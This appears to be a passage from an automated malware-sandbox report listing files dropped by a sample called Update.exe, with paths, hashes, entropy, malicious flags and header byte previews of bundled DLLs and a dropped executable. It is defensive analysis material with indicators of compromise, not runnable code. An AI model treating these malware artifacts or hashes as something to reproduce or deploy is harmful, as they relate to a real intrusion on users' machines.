                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%..7..4......v.........................................O.......P...`.........................................P.H.0....kN.@.....N.|.....K.d.....O../....N....P.C.8.............................C.@............`N..............................text.....7.......7................. ..`.rdata....... 7.......7.............@..@.data....n....K..<....J.............@....pdata..0.....K......4K.............@..@.idata...%...`N..&....N.............@..@.00cfg..u.....N.......N.............@..@.rsrc...|.....N......0N.............@..@.reloc........N......8N.............@..B................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\python3.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):68376
                                  Entropy (8bit):6.150066249409429
                                  Encrypted:false
                                  SSDEEP:768:GV1EbYGVXq6KC/prVHBN0cW18itCQDFPnOMFn+gikF/nFX14uewjBcCCC0yamM/L:GDmF61JFn+/OxpISL0v7Syqx0
                                  MD5:A07661C5FAD97379CF6D00332999D22C
                                  SHA1:DCA65816A049B3CCE5C4354C3819FEF54C6299B0
                                  SHA-256:5146005C36455E7EDE4B8ECC0DC6F6FA8EA6B4A99FEDBABC1994AE27DFAB9D1B
                                  SHA-512:6DDEB9D89CCB4D2EC5D994D85A55E5E2CC7AF745056DAE030AB8D72EE7830F672003F4675B6040F123FC64C19E9B48CABD0DA78101774DAFACF74A88FBD74B4D
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5..Te..Te..Te...m..Te...e..Te.....Te...g..Te.Rich.Te.........PE..d.....bf.........." ...(............................................................OX....`.........................................`...H................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\python312.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):6926616
                                  Entropy (8bit):5.7675148099570395
                                  Encrypted:false
                                  SSDEEP:49152:PPknDqOJlpxSupRo2vXDZ2lgghXQIX2CG4Ts99kdwQAvyodh1GCOepxk1NHh8yfE:kdlpx9p5Loehv6JfDvXHDMiETH+0Tn
                                  MD5:D521654D889666A0BC753320F071EF60
                                  SHA1:5FD9B90C5D0527E53C199F94BAD540C1E0985DB6
                                  SHA-256:21700F0BAD5769A1B61EA408DC0A140FFD0A356A774C6EB0CC70E574B929D2E2
                                  SHA-512:7A726835423A36DE80FB29EF65DFE7150BD1567CAC6F3569E24D9FE091496C807556D0150456429A3D1A6FD2ED0B8AE3128EA3B8674C97F42CE7C897719D2CD3
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D..N%..N%..N%......L%....m.@%......J%......F%......C%..G]..T%...]..E%..N%..>$..]....%..]...O%..].o.O%..]...O%..RichN%..........................PE..d.....bf.........." ...(..(..<B......w.......................................pj.....[.j...`..........................................VN.d...D$O.......i......._..J....i../....i..[....2.T.....................H.(.....2.@.............(..............................text.....'.......(................. ..`.rdata...9'...(..:'...(.............@..@.data....L...PO......>O.............@....pdata...J...._..L....^.............@..@PyRuntim0.....a.......a.............@....rsrc.........i.......h.............@..@.reloc...[....i..\...&h.............@..B........................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\select.pyd

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):31000
                                  Entropy (8bit):6.554631307714331
                                  Encrypted:false
                                  SSDEEP:384:2RVBC9t6Lhz64wHqFslDT90YpISQGrHQIYiSy1pCQ+42AM+o/8E9VF0Nyes:YGyIHqG1HpISQG75YiSyvB2AMxkEp
                                  MD5:D0CC9FC9A0650BA00BD206720223493B
                                  SHA1:295BC204E489572B74CC11801ED8590F808E1618
                                  SHA-256:411D6F538BDBAF60F1A1798FA8AA7ED3A4E8FCC99C9F9F10D21270D2F3742019
                                  SHA-512:D3EBCB91D1B8AA247D50C2C4B2BA1BF3102317C593CBF6C63883E8BF9D6E50C0A40F149654797ABC5B4F17AEE282DDD972A8CD9189BFCD5B9CEC5AB9C341E20B
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t..'..'..'..g'..'...&..'...&..'...&..'...&..'...&..'..'...'...&..'...&..'...&..'...'..'...&..'Rich..'........PE..d.....bf.........." ...(.....2............................................................`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...`....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\ucrtbase.dll

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):1018792
                                  Entropy (8bit):6.641182647518247
                                  Encrypted:false
                                  SSDEEP:24576:hLyubutYBWSlhrANUDk8ExrmxvSZX0ypFiR+c:VyubJvlhrVETiR+c
                                  MD5:8E7680A8D07C3C4159241D31CAAF369C
                                  SHA1:62FE2D4AE788EE3D19E041D81696555A6262F575
                                  SHA-256:36CC22D92A60E57DEE394F56A9D1ED1655EE9DB89D2244A959005116A4184D80
                                  SHA-512:9509F5B07588A08A490F4C3CB859BBFE670052C1C83F92B9C3356AFA664CB500364E09F9DAFAC7D387332CC52D9BB7BB84CEB1493F72D4D17EF08B9EE3CB4174
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.Pc*.>0*.>0*.>0#..0..>0*.?0..>0O..0+.>0O.>1+.>0O.=1..>0O.;1p.>0O.01..>0O.:1d.>0O..0+.>0O.<1+.>0Rich*.>0........................PE..d....A.0.........." .........b.......6..............................................y.....`A........................................ ...........................H....d...'......p....y..T............................B...............o...............................text............................... ..`.rdata...w...0...x..................@..@.data....$..........................@....pdata..H...........................@..@.rsrc................R..............@..@.reloc..p............X..............@..B................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\_MEI78962\unicodedata.pyd

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):1138456
                                  Entropy (8bit):5.461934346955969
                                  Encrypted:false
                                  SSDEEP:12288:LrEHdcM6hbqCjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfcAjL:LrEXPCjfk7bPNfv42BN6yzUAjL
                                  MD5:CC8142BEDAFDFAA50B26C6D07755C7A6
                                  SHA1:0FCAB5816EAF7B138F22C29C6D5B5F59551B39FE
                                  SHA-256:BC2CF23B7B7491EDCF03103B78DBAF42AFD84A60EA71E764AF9A1DDD0FE84268
                                  SHA-512:C3B0C1DBE5BF159AB7706F314A75A856A08EBB889F53FE22AB3EC92B35B5E211EDAB3934DF3DA64EBEA76F38EB9BFC9504DB8D7546A36BC3CABE40C5599A9CBD
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.....}...}...}......}..*|...}..*~...}..*y...}..*x...}..-|...}.H.|...}...|.S.}..-p...}..-}...}..-....}..-....}.Rich..}.........................PE..d.....bf.........." ...(.@..........0*.......................................p............`.........................................p...X............P.......@.......0.../...`......P^..T............................]..@............P..p............................text...!>.......@.................. ..`.rdata..\....P.......D..............@..@.data........ ......................@....pdata.......@......................@..@.rsrc........P.......$..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0is2skvt.avk.psm1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0jdntnts.gfx.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ak0msgfk.abu.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1uumnoi.w4r.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gd0tc1dm.kfc.psm1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hds0g3wv.hb5.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ikqbzahq.k0n.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktmogfoc.w4l.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltilzbsa.03d.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mdfeoeo0.5ph.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mlnlntia.ecz.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onlccc5b.ybn.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgvnbr2a.1mp.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tykxvnkp.e2y.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ubpc1yuz.ahm.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v3ib3te2.oqv.ps1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wgrrzhny.ooi.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wqxlh4ty.ezl.ps1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywo34mdv.ueu.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfqg0gih.mrc.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\nfngdkpnjkmg.tmp

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exe
                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):150528
                                  Entropy (8bit):5.769203996328619
                                  Encrypted:false
                                  SSDEEP:3072:60gp4UGo8MYmB99SrtM0ieiG027bAM8mMu0cM:60c4kzOieR02s
                                  MD5:658AC2968AC81EADBE165CFD2A770C34
                                  SHA1:39D228C2B5D1181ABE8BCE6A95FE852C8E06A79C
                                  SHA-256:4F698FB3C8100837ACB42BEE30B7B0C362BCF6D3C617880BEDC86E1D57C25D11
                                  SHA-512:CAF647E30FB73FE25E879A83C38D24B9E2453754DABBB3B2C7E885B814C9C06053206CBAAE777061C3873FC687DE5F15FAC5058B8B675C57235CFCCC2277A106
                                  Malicious:true
                                  Preview:MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$............qgL.qgL.qgL..aM.qgL..fM.qgL.qfL.qgLO.oM.qgLO..L.qgLO.eM.qgLRich.qgL........................PE..d.....[c.........."...... ...*.......#.........@..........................................`..................................................8.......p..`....`..8....................5..8............................................0...............................text...%........ .................. ..`.rdata.......0.......$..............@..@.data........P......................@....pdata..8....`.......8..............@..@.rsrc...`....p.......:..............@..@........................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\pvt_14b6

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):2.0
                                  Encrypted:false
                                  SSDEEP:3:qn:qn
                                  MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                  SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                  SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                  SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                  Malicious:false
                                  Preview:blat

                                  C:\Users\user\AppData\Local\Temp\q29ljyzz

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):2.0
                                  Encrypted:false
                                  SSDEEP:3:qn:qn
                                  MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                  SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                  SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                  SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                  Malicious:false
                                  Preview:blat

                                  C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exe

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\Update.exe
